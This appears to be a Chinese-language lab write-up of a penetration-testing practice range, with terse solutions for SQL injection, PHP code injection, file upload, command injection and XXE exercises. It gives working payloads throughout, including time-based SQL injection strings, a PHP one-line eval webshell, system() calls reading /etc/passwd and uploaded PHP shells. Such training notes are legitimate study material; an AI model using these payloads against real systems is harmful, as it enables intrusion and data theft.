靶场练习-pentester-i-02

SQL injections
Example 1：测试出有五列数据，999’ union select 1,2,3,4,5–+之后，可以将1，2，3换成database(),@@version,@@datadir等
Example 2：测试发现root’or‘1’=‘1可以
Example 3：测试发现name=root%27or%271%27=%271%27%23可以
Example 4：直接?id=1 or 1=1–+可以
Example 5：同上
Example 6：测试发现3 union select 1,2,3,4,5#可以
Example 7：一直没找到注入方法，查找资料后发现是因为需要换行，疑惑的我决定查看源代码，好吧我承认没看明白，但答案是用换行替换空格?id=5%0aor%201=1%23
Example 8：name` or (if(length(database())=0,NULL,sleep(1)))%23
Example 9：order=age and (if(length(database())=0,NULL,sleep(1)))%23
Code injection
Example 1：代码注入，name=后面跟着的内容都打印，经过一连串报错以后发现name=a";echo"B";echo"c后会输出aBc，然后在echo"B"位置尝试闭合前后的php代码成功，接着在B位置填写一句话木马name=a";?><?php @eval($_POST[‘socgo’]);?><?php echo"c蚁剑可以连接
Example 2：放空参数后报错，随意输入参数也报错，基本就是三个内容：需要两个参数，usort()函数，需要闭合大括号或者$；嗯，然后，然后我也做不出来了，查资料发现闭合方式和命令执行方式，然后尝试=id);}system(‘cd /etc;vi passwd%27);//可以看到敏感信息，也可以多语句执行
Example 3：放空pattern=参数后报错，提示preg_replace()错误，根据尝试预测函数格式是preg_replace(需要替换的字符串/替换为的字符串/原字符串)；尝试闭合，然后，然后有没有然后了；查找资料，发现方向错了，可以在new的位置进行注入，同时需要加e参数，如new=phpinfo()&pattern=/lamer/e&base=Hello lamer
Example 4：放空后assert()报错，但是没有想到怎么注入，查看源代码也没明白，但看到大佬的解答?name=hacker’.system(whoami).'拼接方法，大佬解答地址如下：https://www.freesion.com/article/66791284915/
File Upload
Example 1：直接上传php文件，蚁剑连接成功
Example 2：上传PHP也成功了。。。
Commands injection
Example 1：参数后面分号新命令即可;ls
Example 2：分号换成%0a换行
Example 3：这个没弄明白，看了一下资料才明白，发现在BP抓包里可以看到返回信息
XML attacks
Example 1：xml没整太明白，根据资料]>&passwd;做url编码后可以
Example 2：嗯，按照资料是把XML文档做数据存储使用，利用payload读取其中数据，不太会做继续看资料https://blog.csdn.net/swl412/article/details/128924831
Directory traversal
Example 1: ？…
Example 2: ？…
Example 3: ？…